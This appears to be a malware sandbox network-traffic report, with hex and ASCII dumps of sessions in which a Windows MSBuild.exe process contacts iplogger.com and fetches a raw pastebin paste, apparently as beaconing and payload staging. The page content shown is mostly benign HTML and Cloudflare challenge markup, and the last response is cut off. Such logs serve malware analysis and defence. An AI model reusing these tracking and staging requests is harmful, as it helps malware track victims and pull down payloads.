2024-09-16 19:21:11 UTC	1369	IN	Data Raw: 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 Data Ascii: ntent="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="og:i
2024-09-16 19:21:11 UTC	1369	IN	Data Raw: 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 34 73 3b 61 6e Data Ascii: 338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.4s;an
2024-09-16 19:21:11 UTC	1369	IN	Data Raw: 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f 79 2e 73 70 6c Data Ascii: ata.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_y.spl
2024-09-16 19:21:11 UTC	1369	IN	Data Raw: 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a Data Ascii: .wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-radius:
2024-09-16 19:21:11 UTC	1369	IN	Data Raw: 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61 69 6e 22 Data Ascii: :auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="domain"
2024-09-16 19:21:11 UTC	149	IN	Data Raw: 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: tion='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:21:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49739	104.21.76.57	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:16 UTC	68	OUT	GET /1djqU4 HTTP/1.1 Host: iplogger.com Connection: Keep-Alive
2024-09-16 19:21:16 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Mon, 16 Sep 2024 19:21:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-09-16 19:21:16 UTC	699	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 71 37 65 6d 58 4e 54 6f 2b 5a 75 6a 6e 61 70 6b 6f 46 6b 50 37 39 59 32 34 74 48 58 66 70 6b 65 69 54 53 51 31 6a 6b 51 4e 49 75 76 4b 39 5a 52 48 54 52 68 59 37 58 4d 46 7a 68 4a 2f 4d 70 61 30 67 35 62 36 6d 7a 6e 4a 36 43 49 50 6c 68 75 51 50 52 38 44 39 75 4d 79 4e 63 48 7a 64 30 41 50 2b 38 43 36 62 4e 4b 44 50 45 3d 24 35 50 71 44 2b 77 30 6f 74 59 35 6f 47 30 53 41 73 69 53 54 57 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: q7emXNTo+ZujnapkoFkP79Y24tHXfpkeiTSQ1jkQNIuvK9ZRHTRhY7XMFzhJ/Mpa0g5b6mznJ6CIPlhuQPR8D9uMyNcHzd0AP+8C6bNKDPE=$5PqD+w0otY5oG0SAsiSTWg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-09-16 19:21:16 UTC	1369	IN	Data Raw: 34 30 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 40ef<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-09-16 19:21:16 UTC	1369	IN	Data Raw: 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 Data Ascii: MSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.theme-dark #challenge-error-text{background-image:url(data:image/svg
2024-09-16 19:21:16 UTC	1369	IN	Data Raw: 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d Data Ascii: Igdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuM
2024-09-16 19:21:16 UTC	1369	IN	Data Raw: 2e 33 39 31 70 78 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 67 72 69 64 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68 Data Ascii: .391px}.feedback-content{align-content:space-between;display:inline-grid;height:100vh;margin:0;padding:0}.feedback-content .spacer{margin:0}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top:4rem}.h
2024-09-16 19:21:16 UTC	1369	IN	Data Raw: 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c Data Ascii: tLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{background-image:url
2024-09-16 19:21:16 UTC	1369	IN	Data Raw: 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 20 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 Data Ascii: le}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{text-align:center}.footer .ray-id code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (
2024-09-16 19:21:16 UTC	1369	IN	Data Raw: 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 34 70 78 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 20 61 7b 63 Data Ascii: allenge-error-text{background-position:100%;padding-left:0;padding-right:34px}.challenge-content .spacer{margin:2rem 0}.challenge-content .loading-spinner{height:76.391px}@media (prefers-color-scheme:dark){body{background-color:#222;color:#d9d9d9}body a{c
2024-09-16 19:21:16 UTC	1369	IN	Data Raw: 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e Data Ascii: S4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}}</style><meta http-equiv="refresh" conten
2024-09-16 19:21:16 UTC	1369	IN	Data Raw: 75 69 69 70 6d 66 48 64 44 5a 66 67 42 46 6b 6d 38 59 6f 66 67 4f 74 55 74 34 44 47 62 61 6c 63 6f 30 46 55 35 72 6a 52 4d 79 44 33 6f 5f 59 6f 59 4c 33 44 67 4b 31 4a 47 53 79 56 68 6c 59 75 78 75 71 4b 6f 7a 77 4e 7a 75 6a 58 31 51 44 57 6b 4b 64 68 75 4b 41 51 34 55 5f 63 76 72 4d 4e 77 46 69 78 71 57 54 6e 63 53 31 61 63 62 42 45 67 5f 77 36 36 72 67 43 63 37 59 76 58 43 34 30 68 45 57 58 33 7a 4d 37 4b 46 68 62 39 54 76 48 6f 44 67 2e 35 77 32 77 68 41 4d 6b 6a 54 4e 41 59 4b 39 4d 65 69 6f 2e 71 30 44 30 70 5a 76 50 55 38 41 74 33 5f 71 4e 51 62 79 62 64 6b 70 4b 46 72 4b 77 78 36 68 6b 7a 6a 46 35 34 4d 44 4e 77 68 76 44 6e 39 4d 63 30 36 39 58 32 36 66 4a 67 47 47 66 67 5a 61 67 6c 5f 53 51 76 48 32 48 6d 73 57 32 53 32 57 34 79 50 39 5a 2e 79 6b Data Ascii: uiipmfHdDZfgBFkm8YofgOtUt4DGbalco0FU5rjRMyD3o_YoYL3DgK1JGSyVhlYuxuqKozwNzujX1QDWkKdhuKAQ4U_cvrMNwFixqWTncS1acbBEg_w66rgCc7YvXC40hEWX3zM7KFhb9TvHoDg.5w2whAMkjTNAYK9Meio.q0D0pZvPU8At3_qNQbybdkpKFrKwx6hkzjF54MDNwhvDn9Mc069X26fJgGGfgZagl_SQvH2HmsW2S2W4yP9Z.yk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49740	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:17 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:21:17 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c4337fcc9788ce0-EWR
2024-09-16 19:21:17 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:21:17 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 